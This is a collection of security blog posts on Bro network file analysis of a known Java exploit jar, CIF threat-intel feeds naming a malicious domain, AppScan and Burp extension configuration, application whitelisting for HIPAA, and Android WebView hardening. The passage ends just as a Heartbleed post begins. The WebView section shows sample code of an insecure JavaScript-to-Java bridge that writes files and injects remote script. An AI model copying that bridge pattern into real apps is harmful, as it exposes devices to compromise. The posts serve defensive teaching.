00078b0: db66 0000 6234 612f 6234 642e 636c 6173 .f..b4a/b4d.clas
00078c0: 7350 4b01 0214 0014 0008 0808 0020 8f1c sPK.......... ..
00078d0: 4167 fdc8 0309 0700 00a7 0f00 000d 0000 Ag..............
00078e0: 0000 0000 0000 0000 0000 0034 7000 0062 ...........4p..b
00078f0: 3461 2f62 3465 2e63 6c61 7373 504b 0102 4a/b4e.classPK..
0007900: 0a00 0a00 0008 0000 208f 1c41 0000 0000 ........ ..A....
0007910: 0000 0000 0000 0000 0400 0000 0000 0000 ................
0007920: 0000 0000 0000 7877 0000 6234 612f 504b ......xw..b4a/PK
0007930: 0506 0000 0000 0700 0700 9401 0000 9a77 ...............w
0007940: 0000 0000 ....



While the first bytes in the file header (also known as magic numbers) suggest a ZIP file, the content of the file indicates the presence of Java class files. We can easily confirm that by executing:

 $ jar xf extract-HTTP-FC7cMq18xeqtT9IGD3


Which extracts the Java classes to the b4a directory.
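Alternatively, we can list the archive’s contents without unpacking it, for instance with Python’s zipfile module. A small sketch; the file name below matches the one Bro extracted above.

import zipfile

# List the archive members to confirm it holds Java .class files
with zipfile.ZipFile("extract-HTTP-FC7cMq18xeqtT9IGD3") as z:
    for name in z.namelist():
        print(name)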

We’ll leave the analysis of the Java classes for now, but can you identify if this is a malicious file with the information we have at this moment? Well, let’s see what others know about this file. Remember the MD5 hash included in the files.log? A quick search in Virustotal reveals that we’re looking at a Java 0-day that was included in the Blackhole Exploit Kit (CVE-2012-4681).

As you can see, the possibilities of using the new file analysis framework are endless. Add a bit of knowledge of the Bro programming language, some python scripting goodness and a few APIs to malware analysis services and you have an awesome cocktail!
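As a taste of that “python scripting goodness”, here is a rough sketch that looks up the MD5 recorded in files.log against VirusTotal’s public API v2. The API key is a placeholder and the response handling is simplified, so treat it as an illustration rather than a finished tool, and check the current VirusTotal documentation before relying on it.

import json
import urllib.parse
import urllib.request

API_KEY = "your-api-key-here"  # placeholder: use your own VirusTotal API key
MD5 = "0cbc25ade65bcd7a28dd8ac62ea20186"  # hash taken from files.log above

# Query the file report endpoint for this hash
params = urllib.parse.urlencode({"apikey": API_KEY, "resource": MD5}).encode()
with urllib.request.urlopen("https://www.virustotal.com/vtapi/v2/file/report", params) as resp:
    report = json.loads(resp.read().decode())

if report.get("response_code") == 1:
    print(MD5, ":", report["positives"], "/", report["total"], "engines flag this file")
else:
    print(MD5, ": not found in VirusTotal")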

Bro, Threat Intelligence and CIF

Threat Intelligence is the new holy grail of security. Finding relevant and up-to-date information on malicious threats is key for all the phases of the security lifecycle, from prevention, to detection, incident response, containment and forensic analysis. The most common types of threat intelligence required by analysts are IP addresses, domains, urls and file hashes that have been observed in relation to malicious activity.

Many organizations provide data feeds that are freely available and that can be used with Bro’s new Intel Framework to log hits seen in network streams, like those from ZeuS and SpyEye Tracker, Malware Domains, Spamhaus, Shadowserver, Dragon Research Group, and others.

While you could download these data feeds on a regular basis, maintaining an updated repository that is actually usable by your tools can be a daunting task, especially given the number of sources and disparity of formats used. This is where the Collective Intelligence Framework (CIF) comes to the rescue.

CIF is now on version 1 (stable) and allows you to parse, normalize, store, process, query, share and produce data sets of threat intelligence.

Having installed a few CIF servers I can tell you it’s somewhat complex (maybe not complex but rather tedious), so I will refer you to the official documentation if you want to set up your own instance (see the References below). For the rest of this section I will assume that you have access to a running instance of CIF.

To enable the Bro Intel Framework and allow the integration of CIF feeds, add these three lines to your local.bro file (in Security Onion that’s in /opt/bro/share/bro/site/local.bro):

 @load frameworks/intel/seen
@load frameworks/intel/do_notice
@load policy/integration/collective-intel



CIF is used mainly in two ways: either to query for data stored about an IP address, a domain or a url, or to produce feeds based on the stored data sets. The data feeds available in version 1 can be seen here:


In our example, we’ll generate a list of domains related to malware with a confidence level of 75 or greater. To make sure the output is formatted for Bro, append “-p bro”:

 $ cif -q domain/malware -c 75 -p bro > domain-malware.intel


Note that this command won’t work if you don’t have CIF installed. If you don’t have access to a CIF server you can grab a copy of a file formatted for Bro here (note that this will be outdated by the time you download it so use it for testing purposes only).

The figure below shows the contents of the file generated in CIF’s native format (without using the Bro plugin).



In order to import the new data feed we just generated we need to configure Bro’s Input Framework. To do so, add the following lines to your local.bro file:

 redef Intel::read_files += {
"/opt/bro/feeds/domain-malware.intel",
};



Where /opt/bro/feeds/domain-malware.intel is where you have placed the file generated by CIF. You can add as many files as you want. For more information about different methods to refer to these .intel files check http://blog.bro.org/2014/01/intelligence-data-and-bro_4980.html.

Now the Input Framework will read the information from our text-based file and will send it to the Intel Framework for processing.
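If you just want to experiment without a CIF server, you can also generate a small intel file yourself. The Python sketch below writes a plain domain list in the tab-separated layout the Intel framework expects; the column names follow the Bro 2.2 Intel framework documentation, so double-check them against your version, and the domain used is simply the one from the next example.

# Write a minimal Bro intel file from a list of known-bad domains
HEADER = "#fields\tindicator\tindicator_type\tmeta.source\tmeta.do_notice"

def write_intel(domains, out_path="domain-malware.intel", source="local-feed"):
    with open(out_path, "w") as out:
        out.write(HEADER + "\n")
        for d in domains:
            out.write("%s\tIntel::DOMAIN\t%s\tT\n" % (d, source))

write_intel(["winrar-soft.ru"])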

To demonstrate the combined usage of Bro and CIF I have created sample4.pcap, a simple capture that contains a DNS query to a malicious domain (winrar-soft.ru). Let’s replay this capture with Bro after making all the changes described above:

 $ bro -r sample4.pcap local


See how a new file, intel.log has been created:

 $ cat intel.log 

#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path intel
#open 2014-03-07-21-28-09
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc seen.indicator seen.indicator_type seen.where sources
#types time string addr port addr port string string string string enum enum table[string]
1394223877.224159 C7J79H2v6YLWMaJEk6 192.168.68.138 54212 192.168.68.1 53 - - - winrar-soft.ru Intel::DOMAIN DNS::IN_REQUEST CIF - need-to-know
#close 2014-03-07-21-28-10



Since winrar-soft.ru was included in the feed generated by CIF and imported into Bro, now we can identify any attempt of connection to this malicious domain.

Conclusions

Security analysts will never have enough tools or resources to fight malware. Bro and CIF are two of those invaluable resources that every malware analyst should be aware of.

As their creators state, Bro is much more than an IDS. Bro is a full-featured network analysis framework created with a powerful tool, the Bro Programming Language.

If you want to know more about Bro, CIF, Malware Analysis or Network Forensics check the References section.

About the author

Ismael Valenzuela (GCFA, GREM, GCIA, GCIH, GPEN, GWAPT, GCWN, GCUX, GSNA, CISSP, CISM, 27001 Lead Auditor & ITIL Certified) works as a Principal Architect at McAfee Foundstone Services EMEA. Find him on twitter at @aboutsecurity or at http://blog.ismaelvalenzuela.com

References

Pcap samples used in this post:
Catching “bayas” on the Wire: Practical Kung-Fu to detect Malware Traffic. SANS EU Forensic Summit:
Liam Randall’s samples, exercises and scripts:
Toolsmith: Collective Intelligence Framework:
The Bro Network Security Monitor:
Malware dumps and pcaps:
Collective Intelligence Framework:
Security Onion:
Remnux:

Combatting AppScan's "Scan out of session"

By Kunal Garg.

Web application scanners may produce repetitive findings and flag mostly the obvious vulnerabilities, but they do have their place in a web application penetration test. While they should never be used as the sole way to identify vulnerabilities, they can provide a baseline and act as another available tool for achieving maximum results. All web application scanners are different and some require finer tuning than others. One common issue we see with IBM's AppScan is the "Scan out of session" error. This blog post gives advice on setting up the scan and working around the issue.

When running post-authentication scans, “in-session” detection is an important concept for maximizing scan coverage. Any time the scan goes out of session, the notification “scan out of session” is displayed to the user and the scan is suspended.

With in-session management we basically select a unique pattern on an in-session page, which AppScan continually polls to determine whether the scan is still in session. This pattern needs to be unique and should be present on post-authentication pages. It can be any text, such as “welcome userabc” displayed after a specific user logs on, or it can be a logout button (if present on all the pages).

Recording the login

The first step in configuring the in-session pattern is to record the login using an AppScan macro. Once the login is recorded, tick the checkbox “I want to configure In-session detection” and click Next.



Notice that all the URLs previously recorded in the login macro appear here; select the post-authentication page that contains our unique identifier. In our case, the test application routes to “main.aspx” after login, so this page is selected as the in-session page (right-click and set as In-session).



Now it’s time to select the in-session pattern, which can be done using the “Select in session pattern” button.

Usually AppScan will select the session identifier on its own, but it is always advisable to review the pattern and change it if it’s not unique. In my personal experience, scans based on the automatically selected identifiers tend to run out of session.

The session pattern can be selected either from the page or from its response body in the AppScan browser window, as shown below.



The session pattern is marked as “signoff”.

If the scan goes out of session, there are certain points to consider:

  1. Session cookies are not properly tracked. If the session cookies are not being tracked, they can be marked for tracking from “Login Management”.



  2. Check if the application is still accessible.
  3. Check if the user account is not locked out.


Note: While running in-session scans, make sure that the login and logout pages are out of scope, and take due care when configuring and running automated scans.

Extending Burp Proxy With Extensions

By Chris Bush.

The world of information security is awash with tools to help security practitioners do their jobs more easily, accurately and productively. Regardless of whether you are responsible for doing PCI audits, network vulnerability assessments, enterprise risk assessments, social engineering, or what have you, there’s a tool for that. Usually there are several. Some are good, some not so much. One of the reasons a tool may or may not ultimately be useful is the ability for its functionality to be customized or extended to meet the needs of the practitioner using it. This is never truer than in application security, where every application the security tester confronts is different from the last. Bespoke applications demand bespoke security testing, and this requires that the tools used by the application security professional be not only robust and feature rich, but customizable in a way that allows them to be rapidly extended to fit to the needs of the job at hand.

Pound for pound (or maybe dollar for dollar), the Burp Suite is one of the best tools an application security professional can have in their tool kit. It has capabilities and features on par with, or exceeding, those of big-name commercial application scanners costing tens of thousands of dollars more, all in a single UI where all of the tools integrate and work together seamlessly. Often overlooked is the fact that Burp includes an extensibility framework that allows you to extend Burp’s functionality in a number of useful ways, through loading 3rd party extensions, or writing your own.

An Overview of Extending Burp

The Burp extensibility framework provides the ability to easily extend Burp’s functionality in many useful ways, including:

  • Analyzing and modifying HTTP requests/responses
  • Customizing the placement of attack insertion points within scanned requests
  • Implementing custom scan checks
  • Implementing custom session handling
  • Creating and issuing HTTP requests
  • Controlling and initiating actions within Burp, such as initiating scans or spidering
  • Customizing the Burp UI with custom tabs and context menus
  • Much, much more


There are a growing number of 3rd party extensions available that you can download and use. The BApp Store was recently created, providing access to a number of useful extensions that you can download and add to Burp. Beginning with Burp Suite version 1.6 beta, released along with the BApp Store on March 4, 2014, access to the BApp Store is also provided directly from within Burp’s UI.

Additionally, there are a number of examples available in the Portswigger blog that provide an excellent starting point for writing your own extension, depending on what you are trying to accomplish. Go to the Burp Extender page to see an overview of some of these examples, including links to the full blog posts and downloadable code. And of course, you can always turn to the Burp Extension User Forum for help with writing your own extensions, and more examples contributed by the user community.

In the rest of this article, we’ll provide a quick overview of the Burp Extender tool, which you will use to load extensions and configure Burp to run those extensions. Then we’ll dive right into writing our own custom extension, and create an extension that performs a couple of custom passive scans.

Burp Extender Tool

First, let’s take a look at the Burp Extender Tool. When you select the Extender tab in Burp Suite, there are four sub-tabs that provide access to the functionality and configuration options of the Extender.

Extensions

The Extensions tab (shown below) allows you to load and manage the extensions you are using in Burp. From this tab you can add and remove your extensions, as well as manage the order in which extensions and their resources are invoked. The panel at the bottom provides details on a selected extension, along with tabs that display any output written by the extension and any error messages it produces.



BApp Store

The BApp Store tab, new with version 1.6 beta of Burp Suite, provides direct access to downloadable extensions from the Portswigger BApp Store.



APIs

The APIs tab essentially just provides a convenient reference to the Burp Extensibility API. From here, you can also download the Java interface files, for inclusion in your Java project, as well as download the Javadocs as a set of HTML files that you can access locally for reference.



Options

Finally, the Options tab is where you will configure things like the location of different environments required to run your extensions, depending on whether the extension is written in Java, Python, or Ruby. To run extensions written in Python requires the use of Jython, a Python interpreter that is written in Java. Similarly, to run extensions written in Ruby requires the use of JRuby, a Ruby interpreter written in Java. The Options tab allows you to specify the locations of the Jython JAR file or JRuby JAR file respectively. Download the most recent versions of these and configure Burp Extender to point to them if you will be writing extensions in Python or Ruby.



Loading and managing extensions and configuring the runtime options needed is very straightforward and simple. Refer to the Burp Extender Help page online for additional information.

Writing Your Own Extensions

You can write your own extensions in Burp using the Burp Extensibility API. The API consists of a number of Java interfaces that you will provide implementations of, depending upon what you are trying to accomplish. It is beyond the scope of this article to cover the entire API in detail. Refer to the Burp Extender Javadoc page online for a complete description. Instead, we’ll cover a few key interfaces that are used by all extensions, some that are of practical use to nearly all extensions, as well as some that will be useful in understanding the example extension that will be presented later in this article. As indicated previously, Burp extensions can be written in Java, Python, or Ruby. Choose the language you are most familiar with. We’ll use Python here, for its familiarity and the ease of development as an interpreted language. While code examples provided in this article will be in Python, they should be easily read and understood by anyone with a programming background in Java or another high-level language.

IBurpExtender

The IBurpExtender class is the foundation of every extension you will write. A Burp extension must provide an implementation of IBurpExtender that is declared public, and implements a single method, called registerExtenderCallbacks. This method is invoked when the extension is loaded into Burp, and is passed an instance of the IBurpExtenderCallbacks class. This class provides a number of useful methods that can be invoked by your extension to perform a variety of actions. At its very simplest, an extension in Burp starts out like this:

 from burp import IBurpExtender

class BurpExtender(IBurpExtender):
    def registerExtenderCallbacks(self, callbacks):
        # put your extension code here
        return



IBurpExtenderCallbacks

As indicated above, an instance of this class is passed to the registerExtenderCallbacks method in your IBurpExtender implementation when the extension is loaded in Burp. Through this callbacks object, you have access to a wide variety of useful methods that will help you create your extension. I’ll point out just a few, as these will be of importance as we build out our example custom scanner extension to follow.

  • getHelpers – Obtain an instance of the IExtensionHelpers class, which provides numerous useful "helper" methods that can be used to add functionality to an extension.
  • setExtensionName – Sets the name of the extension as it will appear in the Extensions tab in Burp Suite.
  • registerScannerCheck – Used to register an extension as a custom Scanner check.
  • applyMarkers – Used to apply markers, or highlights, to areas of a request or response. For instance, this may be used to mark a vulnerable parameter in a request, or an area of the response that indicates a vulnerability, such as a reflected XSS payload.


This is just a small taste. There are many other methods available to you in an instance of IBurpExtenderCallbacks. Consult the Burp Extender Javadoc page online for complete details.

IExtensionHelpers

The IExtensionHelpers class provides access to another large set of methods that you will undoubtedly find useful. It will be the rare extension that doesn’t get an instance of this class, which is obtained using a call to the getHelpers() method of IBurpExtenderCallbacks (see above). Just a few examples of the methods provided by this class are the following:

  • analyzeRequest – Used to analyze an HTTP request, and obtain various details, such as a list of parameters, headers, and more.
  • analyzeResponse – Used to analyze an HTTP response, and obtain various details, such as a list of cookies, headers, the response code, and more.
  • urlEncode – Perform URL encoding on a piece of data.
  • urlDecode – Perform URL decoding on a piece of data.
  • indexOf – Searches a piece of data for a specified pattern. This is very useful for searching a request or a response for a specific value, such as PII, or examining the response for a parameter value that was in the corresponding request.
  • bytesToString – Converts data from an array of bytes to a String object. Many of the methods in the Burp API operate on an array of bytes, so this comes in quite handy.

IScannerCheck

Extensions implement this interface when they are going to be used to perform custom scan checks. Your extension must call the registerScannerCheck method of the IBurpExtenderCallbacks class to tell Burp that it is implementing this interface. Burp will then know to use your extension when performing active or passive scans on a base request/response pair, as well as to report any issues (see IScanIssue below) identified by your custom scan checks. The following three methods may be implemented by an IScannerCheck class:

  • consolidateDuplicateIssues – This method is invoked when the custom Scanner check has reported multiple issues for the same URL. You use this to tell Burp whether to keep the existing issue, or replace it with the new issue, based on whatever criteria you decide.
  • doActiveScan – This method is invoked for each insertion point that is actively scanned by Burp. An implementation of this will then construct a new request, based on the base request passed, and insert a test payload into the specified insertion point. It will then issue that new request, and examine the response for an indication that the inserted payload reveals a vulnerability.
  • doPassiveScan – This method is invoked for each base request/response pair that Burp passively scans. An implementation of this will typically examine the base request and/or response for patterns of interest. No new requests should be generated from a passive scan.


Both the doActiveScan and doPassiveScan methods must return a list of IScanIssue objects, which Burp will then automatically include in the Scanner issues report.

IScanIssue

The IScanIssue class provides a representation of a Scanner issue. An extension may retrieve current issues (IScanIssue objects) from the Scanner tool by registering an IScannerListener callback, or by calling the getScanIssue method of the IBurpExtenderCallbacks class. Scanner issues can be added to Burp by implementing the IScanIssue class in your extension, and calling the addScanIssue method of the IBurpExtenderCallbacks class with specific instances. Additionally, Scanner issues can be added via a custom scan check, by creating a list of instances of IScanIssue that is returned by either the doPassiveScan or doActiveScan methods of an IScannerCheck implementation.

Implementing the IScanIssue interface involves implementing a constructor method to set the details of the Scanner issue, as well as a number of getter methods to retrieve those details. We won’t go into details of the various methods here, as they will often be as simple as setting a class variable with a value passed to the constructor, and implementing a getter method that returns this value.

A Custom Passive Scanner



To conclude our discussion, we will present an example extension that implements a custom scanner, which will perform two different passive scan checks:

  • Reflection Checks– Using the values of the parameters in the base request that is being passively scanned, this check searches the corresponding response for those same values, providing a candidate point for further testing for reflected XSS vulnerabilities.
  • Regular Expression Match– Can be used to examine the base response of a passive scan request, looking for any string that matches a particular regular expression. In the context of this example extension, this check is used to do a customized search of application responses using a regular expression designed to match potentially sensitive personally identifiable information (PII) unique to a specific, non-US, country.


The full source code for this example extension can be downloaded from our GitHub page. This extension is written in Python, so to try it out you will first need to download the latest Jython library from The Jython Project, and configure the Burp Extender to use it. Then add the extension, and try it out.

The source code is extensively documented with comments. With the information provided above, as well as the Burp API Javadocs and the comments in the code, it should be easy to grasp what’s going on in the code. In the remainder of this article, I’ll go into a little detail for a few key sections of the code that may be particularly interesting or require some further context for understanding.

Earlier, we showed the simplest example of a Burp extension that does nothing. Recall that at a minimum an extension must implement the IBurpExtender interface, which has one method – registerExtenderCallbacks. Let’s take a quick look at the implementation of our registerExtenderCallbacks method.

 Line 15-26
def registerExtenderCallbacks(self, callbacks):
    # Put the callbacks parameter into a class variable so we have class-level scope
    self._callbacks = callbacks

    # Set the name of our extension, which will appear in the Extender tool when loaded
    self._callbacks.setExtensionName("Custom Passive Scanner")

    # Register our extension as a custom scanner check, so Burp will use this extension
    # to perform active or passive scanning and report on scan issues returned
    self._callbacks.registerScannerCheck(self)

    return



The registerExtenderCallbacks method is passed an instance of the IBurpExtenderCallbacks class. On line 17 above, we are simply storing this callbacks object in a class variable, so that it has class-level scope, allowing any other methods within our BurpExtender class to access it. On line 20, we use one of the methods of the callbacks object, setExtensionName, to set the name of our extension. This is how the extension will be identified in the Extender tool when it is loaded. Finally, on line 24, we call the registerScannerCheck method of the callbacks object. This tells Burp that our extension implements a custom scanner check, and Burp will now call the doActiveScan and doPassiveScan methods of our extension whenever it is performing an active or passive scan, respectively. In our extension, we have only implemented doPassiveScan.

Our implementation of doPassiveScan makes use of a custom class that we have created, called CustomScans, which is not an implementation of anything in the Burp API.

 Line 47
self._CustomScans = CustomScans(baseRequestResponse, self._callbacks)



As we see above, within doPassiveScan, an instance of this class is created, passing the base request/response pair, as well as our instance of IBurpExtenderCallbacks that was created as a class variable in the registerExtenderCallbacks earlier. The purpose of the CustomScans class is to implement one or more methods that we can call that perform unique scan checks against the base request/response pair being passively scanned. In this extension, we’ve implemented two methods in CustomScans, called findReflections and findRegEx, whose purpose was described above.

Next, the extension’s implementation of doPassiveScan calls the findReflections method of CustomScans. This method will examine the base request/response pair, passed previously to the constructor for CustomScans, and identify any request parameters whose value appears in the corresponding response.

 Line 51-62
issuename = "Possible Reflected XSS"
issuelevel = "Information"
issuedetail = """The value of the $param$ request parameter appears
in the corresponding response. This indicates that there is a
potential for reflected cross-site scripting (XSS), and this URL
should be tested for XSS vulnerabilities using active scans and
thorough manual testing and verification. """

tmp_issues = self._CustomScans.findReflections(issuename, issuelevel, issuedetail)

# Add the issues (if any) from findReflections to the list of issues to be returned
scan_issues = scan_issues + tmp_issues



Three arguments passed to findReflections provide information used to construct any new scan issues, including the issue name, level (or severity), and issue details. Note that the argument representing the issue details contains HTML tags. Burp will interpret these tags and render the issue details in its UI accordingly. Finally, the findReflections method returns a list of scan issues, in tmp_issues, which is then appended to the list of issues, scan_issues, which will ultimately be returned to Burp from doPassiveScan.

Following the above code, lines 69-81 follow a similar pattern, calling CustomScans.findRegEx, and appending any resulting issues to the scan_issues list. Lines 85-88 then return scan_issues if it is not empty; otherwise they return None (think null). Burp will then include the returned issues, if any, in the Scanner issues report.

The findReflections and findRegEx methods of CustomScans should be fairly straightforward to understand, and each follows a very similar flow. Lines 127-136 of findReflections, and lines 160-169 of findRegEx in particular follow a very similar pattern, which we’ll explain below.

 Line 127-136 (findReflections)
offset[0] = start
offset[1] = start + len(paramVal)
offsets.append(offset)

# Create a ScanIssue object and append it to our list of issues, marking
# the reflected parameter value in the response.
scan_issues.append(ScanIssue(self._requestResponse.getHttpService(),
self._helpers.analyzeRequest(self._requestResponse).getUrl(),
[self._callbacks.applyMarkers(self._requestResponse, None, offsets)],
issuename, issuelevel, issuedetail.replace("$param$", paramName)))


The first three lines set up an array that is used to store offsets used to apply a marker to a region of the response, in this case to highlight the reflected parameter value. The first array element contains the start position of the identified value, and the second element contains its end position. This array of two values is then appended to a list, called offsets, which will be passed to the applyMarkers method of IBurpExtenderCallbacks when the new scan issue is created. The applyMarkers method expects a List of arrays in its last two arguments, each array containing the start and end values of regions to be marked in the request and response respectively.

The last four lines above create an instance of our ScanIssue class, which is our extension’s implementation of the IScanIssue interface, by calling its constructor with a number of arguments. We then append that new instance of ScanIssue to a list, called scan_issues, which will be returned back to our caller, doPassiveScan. In the call to the constructor for our ScanIssue, we call the applyMarkers method of IBurpExtenderCallbacks, passing the base request/response pair, and offsets for applying markers to the request (None in this case), and to the response, using the list, offsets, described above. The last three arguments to the ScanIssue constructor provide the issue name, issue level (severity), and issue detail information that was passed as arguments to findReflections. Here, we are replacing a token in the literal string passed in the issuedetail argument with the name of the parameter whose value was reflected in the response. This adds useful detail to the new scan issue for the tester, and also makes it so Burp will identify the issue as a unique instance when it calls our extension’s consolidateDuplicateIssues method.

The findRegEx method in CustomScans follows a similar pattern to that described above for findReflections. It makes use of Python’s regular expression operations to search the response, but otherwise uses the same techniques to create new scan issues as in findReflections.
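As a simplified illustration of that idea (not the extension’s actual findRegEx code), the snippet below scans a response body for a made-up national ID format and records the match offsets, which is exactly the information needed to call applyMarkers:

import re

# Hypothetical PII pattern, e.g. a national ID written as 12.345.678-9
PII_REGEX = re.compile(r"\b\d{2}\.\d{3}\.\d{3}-[0-9kK]\b")

def find_pii(response_body):
    # Return (start, end, matched text) tuples for every hit
    return [(m.start(), m.end(), m.group()) for m in PII_REGEX.finditer(response_body)]

print(find_pii("customer id: 12.345.678-9"))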

One part of findReflections that is perhaps non-intuitive when examining the code is the following:

 Line 122
if len(paramVal) > 3:



Here we are checking the length of the variable paramVal, which holds the value of the parameter we are currently checking for reflection. In order to prevent a lot of noise from coincidental matches, we are simply checking that the parameter’s value is greater than three characters long. This is a fairly simplistic approach, and you are free to try any heuristic you can think of here. Regardless of what you try, since this is a passive scan, eliminating potentially coincidental matches may also eliminate true reflection of parameter values that may in fact be vulnerable to XSS. Remember, the point of this passive XSS scan is only to identify candidate points for further examination and testing, not to actually identify XSS vulnerabilities. Caveat emptor.

Lastly, there are some additional classes from the Burp Extensibility API that are being used in the example extension that have not been covered here. These classes are not explicitly implemented in the extension, but are used implicitly, typically as return values from other methods in the Burp API. They are mentioned briefly below, but you are encouraged to examine these in more detail in the Burp Extender Javadoc page online.

  • IHttpRequestResponse – Representation of an HTTP message
  • IHttpService – Representation of an HTTP service, to which requests can be sent
  • IRequestInfo – Representation of an HTTP request
  • IParameter – Representation of an HTTP request parameter


Conclusion

As you can see, while it does involve some programming, creating Burp extensions is really quite straightforward, and should be no problem for anyone with a reasonable programming or scripting background. In the above example, we have the basics of a fairly useful custom scan check extension that performs two different passive scan checks, in around 160 lines of code (excluding comments).

Try out the example above, visit the new BApp Store, study the Burp Extensibility APIs, and you’re sure to come up with ideas for your own extensions that will help you do your job more easily, accurately, and productively, and get better results by customizing Burp to meet your particular needs. Best of luck.


Application Whitelisting Programs, WinXP EoS, and HIPAA's Security Rule

By The Foundstone Strategic Services Team.

The United States Department of Health and Human Services (HHS) has stated that the “Security Rule does not specify minimum requirements for personal computer operating systems”. Microsoft’s own Windows XP enterprise end of support website points readers directly to the Health and Human Services (HHS) Security Rule guidance on operating system requirements for the personal computer systems used by a covered entity. The HHS guidance covers a situation such as Windows XP End of Support(EoS) when it states that:

"any known security vulnerabilities of an operating system should be considered in the covered entity’s risk analysis (e.g., does an operating system include known vulnerabilities for which a security patch is unavailable, e.g., because the operating system is no longer supported by its manufacturer).”

HHS guidance explicitly addresses the security compliance that an operating system provides when it states:

“the security capabilities of the operating system may be used to comply with technical safeguards standards and implementation specifications such as audit controls, unique user identification, integrity, person or entity authentication, or transmission security.”

It is clear that an unsupported operating system will need to have significant technical safeguards deployed and configured properly to reduce the risk of exploitation. Application whitelisting used to be considered an optional technical security control, but as the nature of networks and applications changed, it moved past being a “best practice” years ago. It is now considered both a basic and standard security control. When configured properly, whitelisting programs can arguably be the strongest component of operating system defense in depth. They can protect against the deliberate or inadvertent exploitation of operating system vulnerabilities, regardless of whether the workstation activity is performed by authorized users, unauthorized users, or malware. Application whitelisting has been identified as the first of the five “Quick Wins” in the Top 20 Security Controls – these are the sub-controls that have the most immediate impact on preventing attacks.

These programs offer a range of features that significantly reduce the attack surfaces that threats are actively attempting to exploit. Risk is reduced because there is much less opportunity to deliberately or unintentionally exploit potential weak spots or vulnerabilities. The ability of application whitelisting programs to limit, disable, or restrict access makes them a significant part of defense-in-depth best practices for all operating systems, including Windows XP as it becomes unsupported.

We'll focus on the feature set of McAfee's Application Control since it is the most available to us, but most other feature-rich whitelisting applications should contain similar functionality. If you're unsure whether all of these items are addressed by the particular program you're evaluating, reach out to the vendor or conduct your own analysis.

Application Control

Achieving compliance with the Security Rule while continuing to use Windows XP will involve documenting your risk analysis and using reasonable and appropriate technical safeguards such as application white listing to reduce the likelihood that threats can exploit vulnerabilities.

Human Threats Addressed:

  • Abuse of Information System
  • Abuse of Privileges
  • Abuse of Resources
  • Damage to ePHI or Business Information
  • Destruction of ePHI or Business Information
  • Theft of ePHI or Business Information
  • Theft of Financial Assets


Threat Agents:

  • Reckless Insiders
  • Untrained Insiders
  • Reckless Information Partner
  • Untrained Information Partner
  • Reckless Line of Business
  • Untrained Line of Business
  • Disgruntled Insider
  • Disgruntled Information Partner
  • 3rd Party Threats
  • Organized Crime


Application whitelisting programs also directly support you if you will be the recipient of a HIPAA Audit Protocol assessment pursuant to the HITECH Act audit mandate. They can specifically enforce or support compliance for the following components of the Audit Protocol assessment:
  • Information Access Management §164.308(a)(4)
  • Workstation Use (§164.310(b))
  • Access Control requirement “to allow access only to those persons or software programs that have been granted access rights”
  • Audit Control (§164.312(b))


For environments where there is a need to comply with the Centers for Medicare & Medicaid Services (CMS) requirements, which involve NIST 800-53 standards, application whitelisting programs support meeting these NIST control family standards:

  • Access Control (AC) - This control family includes mechanisms used to designate who or what is to have access to a specific resource and the type of transactions and functions that are permitted.
  • Configuration Management (CM) - This control family aims to address the activities that present a risk of integration failure due to component change. This includes change control processes and asset management.
  • Maintenance (MA) - This control family addresses the requirement that trusted systems within the environment retain their trustworthiness over time. Key elements include patch management, system builds, and hardening processes
  • System and Information Integrity (SI)– The controls in this family are used to protect data from accidental or malicious alteration or destruction and to provide assurance to the user the information meets expectations about its quality and integrity. Additionally, this family covers various aspects of flaw remediation.


CMS has also referenced the Top 20 Critical Security Controls (now maintained by The Council on CyberSecurity). The latest version of the Top 20 (Critical Controls Version 5.0) continues identifying application whitelisting as the first of five “Quick Wins”; these are the sub-controls that have the most immediate impact on preventing attacks.

Enjoy!



*Image above was borrowed from here

Secure Usage of Android Webview:

By Naveen Rudrappa

The WebView class is one of Android's most powerful classes: it renders web pages like a normal browser. Applications can interact with a WebView by adding hooks, monitoring changes being made, injecting JavaScript, and so on. Even though this seems like a great feature, it introduces security loopholes if not used with caution. Since WebView can be customized, it creates the opportunity to break out of the sandbox and bypass the same-origin policy.

WebView allows sandbox bypass in two different scenarios:

  1. JavaScript can invoke Java code.
  2. Java code can invoke JavaScript.


Sample code to Invoke Java from JavaScript:

 wv.addJavascriptInterface(new FileUtils(), "file");
<script>
    filename = '/data/data/com.Foundstone/data.txt';
    file.write(filename, data, false);
</script>



Sample code to Invoke JavaScript from Java:

 String javascr = "javascript: var newscript=document.createElement(\"script\");";
javascr += "newscript.src=\"http://www.foundstone.com\";";
javascr += "document.body.appendChild(newscript);";
myWebView.loadUrl(javascr);



The bridge that enables these bypasses is addJavascriptInterface. Any class exposed through addJavascriptInterface allows commands to be run on the Android device from JavaScript, which can lead to complete compromise. Hence, implementing addJavascriptInterface carelessly is not safe either.

To implement secure usage of WebView, follow the solutions below:

  • Compile the application against Android API level 17 or higher. This API level forces developers to add the @JavascriptInterface annotation to any method that is to be exposed to JavaScript. It also prevents access to operating system commands (via java.lang.Runtime).
  • Disable support for JavaScript. If there is no reason to support JavaScript within the WebView, then it should be disabled. The Android WebSettings class can be used to disable support for JavaScript via the public method setJavaScriptEnabled:
     webview = new WebView(this); webview.getSettings().setJavaScriptEnabled(false);


  • Send all traffic over SSL. Any traffic in the clear is easy to sniff and manipulate using a Man-in-the-Middle attack. With SSL, an attacker cannot inject script via MITM and therefore cannot break the WebView sandbox.
  • To avoid security issues from the WebView, always restrict users to the application domain using code like the example below. By restricting users to a known domain we prevent JavaScript from being loaded from untrusted websites.
     WebViewClient wvclient = new WebViewClient() {
         // override the "shouldOverrideUrlLoading" hook.
         public boolean shouldOverrideUrlLoading(WebView view, String url) {
             if (!url.startsWith("http://clientlocation.com")) {
                 // hand off any external URL to the default browser instead of this WebView
                 Intent i = new Intent("android.intent.action.VIEW", Uri.parse(url));
                 startActivity(i);
                 return true;
             }
             return false;
         }
         // override the "onPageFinished" hook.
         public void onPageFinished(WebView view, String url) { ... }
     };
     webView.setWebViewClient(wvclient);


Heartbleed Recap and Testing

By Mateo Martinez and Melissa Augustine.

CVE-2014-0160 also known as the "Heartbleed Bug", is a serious vulnerability in OpenSSL, one of the most widely used cryptographic libraries. This bug has been present in OpenSSL since March 14, 2012 with the release of version 1.0.1 and specifically affects OpenSSL's implementation of the TLS/DTLS protocols.

To summarize, Heartbleed allows anyone to read the memory of a system running services that use OpenSSL for TLS/DTLS.

Why HeartBleed?

